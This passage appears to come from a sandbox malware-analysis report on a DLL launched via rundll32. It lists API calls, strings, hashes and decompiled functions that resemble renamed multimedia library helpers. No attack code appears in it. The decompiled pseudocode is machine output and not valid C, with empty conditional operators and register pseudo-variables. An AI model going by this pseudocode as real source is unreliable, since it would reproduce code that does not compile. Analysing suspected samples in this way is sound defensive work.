                                                      • Instruction Fuzzy Hash: 273148B8A087068FD700DF69C58061AFBE4FF88384F11892EE99CC7315E774E8558B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
                                                      • String ID:
                                                      • API String ID: 1780169607-0
                                                      • Opcode ID: 89fe73e6439e83052310f9247eaea9b5c1dd9965fdfc5345831e5e410a5014f8
                                                      • Instruction ID: 308d306f19edf6ed78ffa685c28ceabba911b28968eaf46d4c5fb4499698521b
                                                      • Opcode Fuzzy Hash: 89fe73e6439e83052310f9247eaea9b5c1dd9965fdfc5345831e5e410a5014f8
                                                      • Instruction Fuzzy Hash: 543102B0016390CFD740EF50E549B06BBA0FB00315FA6C9A9C50A1F262D7BED944CBD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_pix_fmt_desc_get.MAIN ref: 1002067F
                                                      • mv_image_get_linesize.MAIN ref: 100206B4
                                                        • Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976
                                                      • mv_image_fill_linesizes.MAIN(?), ref: 10020748
                                                      • mv_image_fill_plane_sizes.MAIN(?), ref: 100207AB
                                                      Strings
                                                      • Picture size %ux%u is invalid, xrefs: 100207FF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
                                                      • String ID: Picture size %ux%u is invalid
                                                      • API String ID: 3680373976-1963597007
                                                      • Opcode ID: 363d7f5b0f2576a8b82a55742b866563a56274ce2c15312feba007e7f86faec8
                                                      • Instruction ID: 2314817fb5d2ccefc3c8ff58fcc714fc26626ca1613a84a068ef5f43893ec408
                                                      • Opcode Fuzzy Hash: 363d7f5b0f2576a8b82a55742b866563a56274ce2c15312feba007e7f86faec8
                                                      • Instruction Fuzzy Hash: C4512576A083418FC354CF69D88564FBBE6EFC8350F558A2EF598C7351EA74E8448B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 26%
                                                      			E100121A0(intOrPtr* _a4, signed int* _a8, char _a12, char _a16) {
                                                      				char _v1052;
                                                      				char _v1053;
                                                      				char _v1054;
                                                      				char _v1055;
                                                      				char _v1072;
                                                      				char _v1076;
                                                      				intOrPtr _v1100;
                                                      				intOrPtr _v1104;
                                                      				intOrPtr _v1108;
                                                      				signed int* _v1112;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				char _t41;
                                                      				signed int _t43;
                                                      				signed int _t47;
                                                      				void* _t62;
                                                      				char* _t63;
                                                      				intOrPtr* _t65;
                                                      				char _t67;
                                                      				signed int* _t71;
                                                      				void* _t72;
                                                      				intOrPtr* _t74;
                                                      				void* _t77;
                                                      				char* _t78;
                                                      				intOrPtr* _t79;
                                                      
                                                      				_t79 =  &_v1100;
                                                      				_t71 = _a8;
                                                      				_t41 = _a12;
                                                      				_v1053 = 0;
                                                      				_t67 = _a16;
                                                      				_t74 = _a4;
                                                      				_v1072 = _t41;
                                                      				_v1076 = _t67;
                                                      				_v1055 = _t67;
                                                      				_v1054 = _t41;
                                                      				if(_t71 == 0 || _t67 == 0 || _t41 == 0 || _t67 == _t41 || _t67 == 0x5c || _t41 == 0x5c) {
                                                      					return 0xffffffea;
                                                      				}
                                                      				if(_t74 == 0 ||  *_t74 == 0) {
                                                      					 *_t79 = 0x100b1205;
                                                      					_t43 = E100267C0(_t62, _t71, _t74, _t77);
                                                      					 *_t71 = _t43;
                                                      					asm("sbb eax, eax");
                                                      					return _t43 & 0xfffffff4;
                                                      				}
                                                      				_v1108 = 0xffffffff;
                                                      				_t63 =  &_v1052;
                                                      				_v1112 = 0x40;
                                                      				_t78 =  &_v1055;
                                                      				 *_t79 = _t63;
                                                      				E10008880(_t63, _t71, _t74, _t78);
                                                      				_t47 = 0;
                                                      				_t65 = _t74;
                                                      				_a8 = _t71;
                                                      				_t72 = 0;
                                                      				if( *_t65 > 0) {
                                                      					while(1) {
                                                      						_t74 =  *((intOrPtr*)(_t65 + 4)) + _t47 * 8;
                                                      						if(_t74 == 0) {
                                                      							goto L14;
                                                      						}
                                                      						if(_t72 != 0) {
                                                      							 *_t79 = _t63;
                                                      							_v1108 = 1;
                                                      							_v1112 =  &_v1076;
                                                      							_a4 = _t65;
                                                      							L10008F30();
                                                      							_t65 = _a4;
                                                      						}
                                                      						_v1108 = _t78;
                                                      						_v1104 = 1;
                                                      						_t72 = _t72 + 1;
                                                      						_v1100 = 0;
                                                      						_a4 = _t65;
                                                      						 *_t79 = _t63;
                                                      						_v1112 =  *_t74;
                                                      						E10009730();
                                                      						_v1108 = 1;
                                                      						_v1112 =  &_v1072;
                                                      						 *_t79 = _t63;
                                                      						L10008F30();
                                                      						_v1100 = 0;
                                                      						_v1104 = 1;
                                                      						_v1108 = _t78;
                                                      						 *_t79 = _t63;
                                                      						_v1112 =  *((intOrPtr*)(_t74 + 4));
                                                      						E10009730();
                                                      						_t65 = _a4;
                                                      						_t47 = _t74 + 1;
                                                      						if( *_t65 > _t47) {
                                                      							continue;
                                                      						}
                                                      						goto L14;
                                                      					}
                                                      				}
                                                      				L14:
                                                      				 *_t79 = _t63;
                                                      				_v1112 = _a8;
                                                      				return E10009690(_t63, _t65, _a8, _t74);
                                                      			}































                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
                                                      • String ID:
                                                      • API String ID: 806756221-0
                                                      • Opcode ID: bd899ef9b0dbaba746c8b6d0da506afdd114f8397f9f9c4fb8b0c4949863bb04
                                                      • Instruction ID: 7187b0243939ecc75a9d4dff51427cd59bf1c299843c139242dac8f39c04a417
                                                      • Opcode Fuzzy Hash: bd899ef9b0dbaba746c8b6d0da506afdd114f8397f9f9c4fb8b0c4949863bb04
                                                      • Instruction Fuzzy Hash: 134114B55093449FC360CF28C08029BFBE5FF86354F55892EE9988B341E736EA95CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_expr_parse_and_eval.MAIN ref: 1002C5F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_expr_parse_and_eval
                                                      • String ID: all$default$max$min$none
                                                      • API String ID: 2217327432-3292705889
                                                      • Opcode ID: e2d7b0edeec2b1870f040b64e547b800b90d05965a24d8d30024c1e278e1b004
                                                      • Instruction ID: 83d07ffb6d8c6cfe48df1192a88470446e278d9b2bcb376e76410f15be41486f
                                                      • Opcode Fuzzy Hash: e2d7b0edeec2b1870f040b64e547b800b90d05965a24d8d30024c1e278e1b004
                                                      • Instruction Fuzzy Hash: A6410475A097458BC395EF28E04038BBBE5FFC9314F618A2EE9C9D7200EB71D9448B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log$strcmp
                                                      • String ID: %-15s
                                                      • API String ID: 1163046698-755444208
                                                      • Opcode ID: 8817496acbf438144a82c63c68a2b26bf455b6893397366e45a129ce34d41058
                                                      • Instruction ID: c2e3231857e14b6d66286021a66802d314ea6e9fac30e20b35dba61e0b599c78
                                                      • Opcode Fuzzy Hash: 8817496acbf438144a82c63c68a2b26bf455b6893397366e45a129ce34d41058
                                                      • Instruction Fuzzy Hash: 39319E78A093459FC750DF28E19065EBBE1EF88B80F91C82EF89987351E774E9409B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _errno$_sopenrandstrlen
                                                      • String ID: XXXX
                                                      • API String ID: 1081397658-1518373315
                                                      • Opcode ID: 41818ad3e72adebc80571ed86afad46c9302ef0646f7f912c4873975d3c77747
                                                      • Instruction ID: 44b3c0712c4d6cf3a6541ef21b7e2c07706476ce399c25bdb07493ab5c095def
                                                      • Opcode Fuzzy Hash: 41818ad3e72adebc80571ed86afad46c9302ef0646f7f912c4873975d3c77747
                                                      • Instruction Fuzzy Hash: CA21F571D0834ACFC318EF35889416A7BE0FF8A354F12892FE6548B291DF319949CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_buffer_pool_uninit.MAIN ref: 1001D7BB
                                                        • Part of subcall function 1000A650: AcquireSRWLockExclusive.KERNEL32 ref: 1000A66C
                                                        • Part of subcall function 1000A650: mv_freep.MAIN ref: 1000A69C
                                                        • Part of subcall function 1000A650: ReleaseSRWLockExclusive.KERNEL32 ref: 1000A6AB
                                                      • mv_buffer_unref.MAIN ref: 1001D7F2
                                                      • mv_buffer_unref.MAIN ref: 1001D801
                                                      • mv_freep.MAIN ref: 1001D810
                                                      • mv_freep.MAIN ref: 1001D822
                                                      • mv_freep.MAIN ref: 1001D831
                                                      • mv_freep.MAIN ref: 1001D83D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_freep$ExclusiveLockmv_buffer_unref$AcquireReleasemv_buffer_pool_uninit
                                                      • String ID:
                                                      • API String ID: 3286761627-0
                                                      • Opcode ID: c6c09d7d300876a1707853c3afdde09c35c9359a08c94a7bfa9ac57c73ae979d
                                                      • Instruction ID: d019eb9eba46684987302df58934bd10d6a5c0a39701eb176e19b0f551cd46b2
                                                      • Opcode Fuzzy Hash: c6c09d7d300876a1707853c3afdde09c35c9359a08c94a7bfa9ac57c73ae979d
                                                      • Instruction Fuzzy Hash: FE1198B86087018FDB04EF69D485A1EFBE1FF84204F46895DE4948B306E735E889CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1000C220() {
                                                      				char* _t55;
                                                      				void* _t57;
                                                      				void* _t59;
                                                      				void* _t63;
                                                      				unsigned int _t64;
                                                      				signed char _t66;
                                                      				void* _t67;
                                                      				unsigned int _t72;
                                                      				unsigned int _t73;
                                                      				void* _t75;
                                                      				intOrPtr _t77;
                                                      				void* _t81;
                                                      				int _t82;
                                                      				signed int _t83;
                                                      				intOrPtr _t88;
                                                      				void* _t92;
                                                      				int _t95;
                                                      				signed int _t96;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t107;
                                                      				void* _t113;
                                                      				void* _t116;
                                                      				void** _t119;
                                                      				void* _t122;
                                                      				intOrPtr* _t123;
                                                      				void** _t125;
                                                      
                                                      				_t123 = _t122 - 0x1c;
                                                      				_t77 =  *((intOrPtr*)(_t123 + 0x20));
                                                      				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
                                                      				if(_t88 <= 0x3ff) {
                                                      					 *((intOrPtr*)(_t123 + 8)) = _t88;
                                                      					_t55 = "AMBI%d";
                                                      					 *(_t123 + 4) = _t55;
                                                      					 *_t123 = _t77;
                                                      					L1();
                                                      					return _t55;
                                                      				} else {
                                                      					if(__eax <= 0x28) {
                                                      						__edx =  *(0x100af280 + __eax * 8);
                                                      						if(__edx == 0) {
                                                      							goto L34;
                                                      						} else {
                                                      							 *(__esp + 8) = __edx;
                                                      							__eax = "%s";
                                                      							 *(__esp + 4) = __eax;
                                                      							 *__esp = __ecx;
                                                      							L1();
                                                      							__esp = __esp + 0x1c;
                                                      							return __eax;
                                                      						}
                                                      					} else {
                                                      						if(__eax != 0xffffffff) {
                                                      							L34:
                                                      							 *(__esp + 8) = __eax;
                                                      							__eax = "USR%d";
                                                      							 *(__esp + 4) = __eax;
                                                      							 *__esp = __ecx;
                                                      							L1();
                                                      							__esp = __esp + 0x1c;
                                                      							return __eax;
                                                      						} else {
                                                      							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
                                                      							__edx = "NONE";
                                                      							 *(__esp + 0x24) = "NONE";
                                                      							__esp = __esp + 0x1c;
                                                      							_t125 = _t123 - 0x2c;
                                                      							_t119 = _t125[0x10];
                                                      							_t72 = _t119[2];
                                                      							_t125[6] =  &(_t119[4]);
                                                      							while(1) {
                                                      								_t57 = _t119[1];
                                                      								_t90 =  <=  ? _t57 : _t72;
                                                      								_t73 = _t72 - ( <=  ? _t57 : _t72);
                                                      								if(_t73 != 0) {
                                                      									goto L2;
                                                      								}
                                                      								 *_t125 = 0;
                                                      								_t125[3] =  &(_t125[0x12]);
                                                      								_t125[2] = _t125[0x11];
                                                      								_t125[1] = 0;
                                                      								_t59 = L10093500();
                                                      								_t113 = _t59;
                                                      								if(_t59 > 0) {
                                                      									L4:
                                                      									_t92 = _t119[2];
                                                      									_t64 = _t119[3];
                                                      									_t75 = _t119[1];
                                                      									if(_t92 == _t64 || _t75 >= _t92) {
                                                      										L25:
                                                      										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
                                                      										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
                                                      										_t119[1] = 0xfffffffa;
                                                      										if(_t92 == 0) {
                                                      											goto L16;
                                                      										} else {
                                                      											_t94 =  >  ? _t59 : _t92 - 1;
                                                      											_t63 =  *_t119;
                                                      											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
                                                      											return _t63;
                                                      										}
                                                      									} else {
                                                      										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
                                                      										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
                                                      										_t72 = _t64;
                                                      										if(_t64 >> 1 >= _t92) {
                                                      											_t72 = _t92 + _t92;
                                                      										}
                                                      										if(_t72 < _t81) {
                                                      											_t87 =  <=  ? _t64 : _t81;
                                                      											_t72 =  <=  ? _t64 : _t81;
                                                      										}
                                                      										_t103 =  *_t119;
                                                      										_t125[1] = _t72;
                                                      										if(_t103 == _t125[6]) {
                                                      											 *_t125 = 0;
                                                      											_t66 = E10026280();
                                                      											if(_t66 == 0) {
                                                      												goto L24;
                                                      											} else {
                                                      												goto L18;
                                                      											}
                                                      										} else {
                                                      											 *_t125 = _t103;
                                                      											_t66 = E10026280();
                                                      											if(_t66 == 0) {
                                                      												L24:
                                                      												_t75 = _t119[1];
                                                      												_t92 = _t119[2];
                                                      												goto L25;
                                                      											} else {
                                                      												if(_t103 == 0) {
                                                      													L18:
                                                      													_t95 = _t119[1];
                                                      													_t104 = _t66;
                                                      													_t116 =  *_t119;
                                                      													_t82 = _t95 + 1;
                                                      													_t125[7] = _t116;
                                                      													if(_t82 >= 8) {
                                                      														if((_t66 & 0x00000001) != 0) {
                                                      															_t83 =  *_t116 & 0x000000ff;
                                                      															_t104 = _t66 + 1;
                                                      															_t116 = _t116 + 1;
                                                      															 *_t66 = _t83;
                                                      															_t82 = _t95;
                                                      														}
                                                      														if((_t104 & 0x00000002) != 0) {
                                                      															_t96 =  *_t116 & 0x0000ffff;
                                                      															_t104 = _t104 + 2;
                                                      															_t116 = _t116 + 2;
                                                      															_t82 = _t82 - 2;
                                                      															 *(_t104 - 2) = _t96;
                                                      														}
                                                      														if((_t104 & 0x00000004) == 0) {
                                                      															goto L19;
                                                      														} else {
                                                      															_t107 = _t104 + 4;
                                                      															 *(_t107 - 4) =  *_t116;
                                                      															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
                                                      															_t125 =  &(_t125[3]);
                                                      															goto L13;
                                                      														}
                                                      													} else {
                                                      														L19:
                                                      														_t67 = memcpy(_t104, _t116, _t82);
                                                      														_t125 =  &(_t125[3]);
                                                      														goto L13;
                                                      													}
                                                      													goto L36;
                                                      												}
                                                      												L13:
                                                      												 *_t119 = _t67;
                                                      												_t119[2] = _t72;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L16:
                                                      									return _t59;
                                                      								}
                                                      								goto L36;
                                                      								L2:
                                                      								_t125[3] =  &(_t125[0x12]);
                                                      								_t125[1] = _t73;
                                                      								_t125[2] = _t125[0x11];
                                                      								 *_t125 = _t57 +  *_t119;
                                                      								_t59 = L10093500();
                                                      								_t113 = _t59;
                                                      								if(_t59 <= 0) {
                                                      									goto L16;
                                                      								} else {
                                                      									if(_t59 < _t73) {
                                                      										goto L24;
                                                      									} else {
                                                      										goto L4;
                                                      									}
                                                      								}
                                                      								goto L36;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L36:
                                                      			}































                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf
                                                      • String ID: AMBI%d$NONE$USR%d
                                                      • API String ID: 3083893021-3656852315
                                                      • Opcode ID: 6cd4f19d3d74ee3d12c501f26348e63cdefaf32e071506f7e6661ce223037e5e
                                                      • Instruction ID: 7fcf34f7b534e12bd35e409064aa58f3f25e521088902b3bc772a385e2e8df73
                                                      • Opcode Fuzzy Hash: 6cd4f19d3d74ee3d12c501f26348e63cdefaf32e071506f7e6661ce223037e5e
                                                      • Instruction Fuzzy Hash: FA0121B4909B85CBD344EF68848052DB6E1FB94384F948A6DE4CC87755E639DE409B83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E1000C3C0() {
                                                      				char* _t55;
                                                      				void* _t57;
                                                      				void* _t59;
                                                      				void* _t63;
                                                      				unsigned int _t64;
                                                      				signed char _t66;
                                                      				void* _t67;
                                                      				unsigned int _t72;
                                                      				unsigned int _t73;
                                                      				void* _t75;
                                                      				intOrPtr _t77;
                                                      				void* _t81;
                                                      				int _t82;
                                                      				signed int _t83;
                                                      				intOrPtr _t88;
                                                      				void* _t92;
                                                      				int _t95;
                                                      				signed int _t96;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t107;
                                                      				void* _t113;
                                                      				void* _t116;
                                                      				void** _t119;
                                                      				void* _t122;
                                                      				intOrPtr* _t123;
                                                      				void** _t125;
                                                      
                                                      				_t123 = _t122 - 0x1c;
                                                      				_t77 =  *((intOrPtr*)(_t123 + 0x20));
                                                      				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
                                                      				if(_t88 <= 0x3ff) {
                                                      					 *((intOrPtr*)(_t123 + 8)) = _t88;
                                                      					_t55 = "ambisonic ACN %d";
                                                      					 *(_t123 + 4) = _t55;
                                                      					 *_t123 = _t77;
                                                      					L1();
                                                      					return _t55;
                                                      				} else {
                                                      					if(__eax <= 0x28) {
                                                      						__edx =  *(0x100af284 + __eax * 8);
                                                      						if(__edx == 0) {
                                                      							goto L34;
                                                      						} else {
                                                      							 *(__esp + 8) = __edx;
                                                      							__eax = "%s";
                                                      							 *(__esp + 4) = __eax;
                                                      							 *__esp = __ecx;
                                                      							L1();
                                                      							__esp = __esp + 0x1c;
                                                      							return __eax;
                                                      						}
                                                      					} else {
                                                      						if(__eax != 0xffffffff) {
                                                      							L34:
                                                      							 *(__esp + 8) = __eax;
                                                      							__eax = "user %d";
                                                      							 *(__esp + 4) = __eax;
                                                      							 *__esp = __ecx;
                                                      							L1();
                                                      							__esp = __esp + 0x1c;
                                                      							return __eax;
                                                      						} else {
                                                      							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
                                                      							__edx = "none";
                                                      							 *(__esp + 0x24) = "none";
                                                      							__esp = __esp + 0x1c;
                                                      							_t125 = _t123 - 0x2c;
                                                      							_t119 = _t125[0x10];
                                                      							_t72 = _t119[2];
                                                      							_t125[6] =  &(_t119[4]);
                                                      							while(1) {
                                                      								_t57 = _t119[1];
                                                      								_t90 =  <=  ? _t57 : _t72;
                                                      								_t73 = _t72 - ( <=  ? _t57 : _t72);
                                                      								if(_t73 != 0) {
                                                      									goto L2;
                                                      								}
                                                      								 *_t125 = 0;
                                                      								_t125[3] =  &(_t125[0x12]);
                                                      								_t125[2] = _t125[0x11];
                                                      								_t125[1] = 0;
                                                      								_t59 = L10093500();
                                                      								_t113 = _t59;
                                                      								if(_t59 > 0) {
                                                      									L4:
                                                      									_t92 = _t119[2];
                                                      									_t64 = _t119[3];
                                                      									_t75 = _t119[1];
                                                      									if(_t92 == _t64 || _t75 >= _t92) {
                                                      										L25:
                                                      										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
                                                      										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
                                                      										_t119[1] = 0xfffffffa;
                                                      										if(_t92 == 0) {
                                                      											goto L16;
                                                      										} else {
                                                      											_t94 =  >  ? _t59 : _t92 - 1;
                                                      											_t63 =  *_t119;
                                                      											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
                                                      											return _t63;
                                                      										}
                                                      									} else {
                                                      										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
                                                      										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
                                                      										_t72 = _t64;
                                                      										if(_t64 >> 1 >= _t92) {
                                                      											_t72 = _t92 + _t92;
                                                      										}
                                                      										if(_t72 < _t81) {
                                                      											_t87 =  <=  ? _t64 : _t81;
                                                      											_t72 =  <=  ? _t64 : _t81;
                                                      										}
                                                      										_t103 =  *_t119;
                                                      										_t125[1] = _t72;
                                                      										if(_t103 == _t125[6]) {
                                                      											 *_t125 = 0;
                                                      											_t66 = E10026280();
                                                      											if(_t66 == 0) {
                                                      												goto L24;
                                                      											} else {
